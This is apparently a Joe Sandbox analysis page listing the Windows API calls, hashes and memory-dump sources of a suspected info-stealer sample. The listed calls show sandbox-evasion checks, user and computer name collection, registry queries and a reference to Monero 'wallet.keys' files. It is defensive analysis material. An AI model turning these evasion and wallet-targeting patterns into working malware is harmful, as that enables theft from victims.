Part of subcall function 00761160: ExitProcess.KERNEL32 ref: 0076117E

Part of subcall function 00761110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0076112B
Part of subcall function 00761110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00761132
Part of subcall function 00761110: ExitProcess.KERNEL32 ref: 00761143

Part of subcall function 00761220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0076123E
Part of subcall function 00761220: __aulldiv.LIBCMT ref: 00761258
Part of subcall function 00761220: __aulldiv.LIBCMT ref: 00761266
Part of subcall function 00761220: ExitProcess.KERNEL32 ref: 00761294

Part of subcall function 00776770: GetUserDefaultLangID.KERNEL32 ref: 00776774

Part of subcall function 00761190: ExitProcess.KERNEL32 ref: 007611C6

Part of subcall function 00777850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007611B7), ref: 00777880
Part of subcall function 00777850: RtlAllocateHeap.NTDLL(00000000), ref: 00777887
Part of subcall function 00777850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0077789F

Part of subcall function 007778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777910
Part of subcall function 007778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00777917
Part of subcall function 007778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0077792F

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01259178,?,0078110C,?,00000000,?,00781110,?,00000000,00780AEF), ref: 00776ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00776AE8
CloseHandle.KERNEL32(00000000), ref: 00776AF9
Sleep.KERNEL32(00001770), ref: 00776B04
CloseHandle.KERNEL32(?,00000000,?,01259178,?,0078110C,?,00000000,?,00781110,?,00000000,00780AEF), ref: 00776B1A
ExitProcess.KERNEL32 ref: 00776B22

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 61a1b946efa2f9e88ddc0557c9a2279da114aaf6451fe8e3b282d275316cb05d
Instruction ID: d8cabfdba04b0bed1aa377179b2fbee0513ebc0b9f67ad9a78047d70264346d3
Opcode Fuzzy Hash: 61a1b946efa2f9e88ddc0557c9a2279da114aaf6451fe8e3b282d275316cb05d
Instruction Fuzzy Hash: 18312E70D14208EBEF05F7B0DC5EAEE7778AF45380F508528F616A2191DF786905CAA2

Function 007699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
LocalFree.KERNEL32(0076148F), ref: 00769A90
CloseHandle.KERNEL32(000000FF), ref: 00769A9A

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 452200efad0f4128a6dd03e09d660ba4e5d7aac0606f59d92b0a4b6637dff4f0
Instruction ID: cce2b7dbf0230e8e131c68e2d371012762bd7288ad4ed1b5008aaa1b17e31803
Opcode Fuzzy Hash: 452200efad0f4128a6dd03e09d660ba4e5d7aac0606f59d92b0a4b6637dff4f0
Instruction Fuzzy Hash: 593109B4A10209EFDB14CF94C985BAE77F9FF49340F108158E916AB390D778AA41CFA1

Function 00774780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0125E3F8), ref: 007747DB

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 00774801
lstrcat.KERNEL32(?,?), ref: 00774820
lstrcat.KERNEL32(?,?), ref: 00774834
lstrcat.KERNEL32(?,0124B9A0), ref: 00774847
lstrcat.KERNEL32(?,?), ref: 0077485B
lstrcat.KERNEL32(?,0125D790), ref: 0077486F

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 00778D90: GetFileAttributesA.KERNEL32(00000000,?,00761B54,?,?,0078564C,?,?,00780E1F), ref: 00778D9F

Part of subcall function 00774570: GetProcessHeap.KERNEL32(00000000,ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br), ref: 00774580
Part of subcall function 00774570: RtlAllocateHeap.NTDLL(00000000), ref: 00774587
Part of subcall function 00774570: wsprintfA.USER32 ref: 007745A6
Part of subcall function 00774570: FindFirstFileA.KERNEL32(?,?), ref: 007745BD

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 974ecdc0b3cc0e1730eb5ad09d5946fb09401636066e8c64152c8ab450dff622
Instruction ID: 37fd5430acd2fa6426426d5bcadd153d3a1e56e01ccd5f625dc9e2d85f4970a1
Opcode Fuzzy Hash: 974ecdc0b3cc0e1730eb5ad09d5946fb09401636066e8c64152c8ab450dff622
Instruction Fuzzy Hash: 393155B2950208A7CB54F770DC89EED737CAB58700F408599B71996081DF78AB89CF96

Function 00761220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0076123E
__aulldiv.LIBCMT ref: 00761258
__aulldiv.LIBCMT ref: 00761266
ExitProcess.KERNEL32 ref: 00761294

Strings

@, xrefs: 00761233

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 6e1e66f9d93144e3d53b89febff2ae827fae5d362e328d8b66e5748aeccd5583
Instruction ID: 730a7529369a47e73e998b08a5bd9174c162543e0d058564cd7a1cb37235f99c
Opcode Fuzzy Hash: 6e1e66f9d93144e3d53b89febff2ae827fae5d362e328d8b66e5748aeccd5583
Instruction Fuzzy Hash: E40128B0E44308EEEF10DBA0CC4DBAEBB78BF04701F648458EA06B6280D77859458B99

Function 007740B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0125D890,00000000,00020119,?), ref: 007740F4
RegQueryValueExA.ADVAPI32(?,0125E458,00000000,00000000,00000000,000000FF), ref: 00774118
RegCloseKey.ADVAPI32(?), ref: 00774122
lstrcat.KERNEL32(?,00000000), ref: 00774147
lstrcat.KERNEL32(?,0125E470), ref: 0077415B

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 6f512c06b0c26592a1c3697c694e85623095bbc1d7cbb73f46d992380acc0b78
Instruction ID: 9e2a023e1314c8ab7f7b7aa52e4381cd619a6e1aef873047ea1d6dd92973c1b6
Opcode Fuzzy Hash: 6f512c06b0c26592a1c3697c694e85623095bbc1d7cbb73f46d992380acc0b78
Instruction Fuzzy Hash: CA41BD76D10108ABDB14EBA0DC4AFFD737DAB89300F408559B61A56181EB755B88CBD2

Function 6CBAC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CBAC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CBAC969
GetSystemInfo.KERNEL32(?), ref: 6CBAC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CBAC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CBAC9E2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: c11d0cb3e86a96c8d27bc244a2cf956d670bf09dd91aa859da956efb36b2dabb
Instruction ID: d91c8aa76e5c0324600576a386072d9f3bf7b9d65c90c7e434be2e50f529babf
Opcode Fuzzy Hash: c11d0cb3e86a96c8d27bc244a2cf956d670bf09dd91aa859da956efb36b2dabb
Instruction Fuzzy Hash: BA2129717052046BDB06AEA9CC85BAE73B9FF46300F60011AF947A7F40DB319C058B96

Function 00777E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777E37
RtlAllocateHeap.NTDLL(00000000), ref: 00777E3E
RegOpenKeyExA.KERNEL32(80000002,0124C158,00000000,00020119,?), ref: 00777E5E
RegQueryValueExA.KERNEL32(?,0125D9D0,00000000,00000000,000000FF,000000FF), ref: 00777E7F
RegCloseKey.ADVAPI32(?), ref: 00777E92

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 51d6e8cea952e035567ba68d95d88adfec299c2162dfada3b1fa897238f044d5
Instruction ID: dccdd62f5a43434726eb998f106ba4557d39cdd39c736982c73ebb92a1b21dd5
Opcode Fuzzy Hash: 51d6e8cea952e035567ba68d95d88adfec299c2162dfada3b1fa897238f044d5
Instruction Fuzzy Hash: D51191B1A48205EBDB14CF94DC49FBBBBB8EB05B00F108119F605A7290D7B85800DBE1

Function 007612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007612B4
RtlAllocateHeap.NTDLL(00000000), ref: 007612BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007612D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007612F5
RegCloseKey.ADVAPI32(?), ref: 007612FF

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
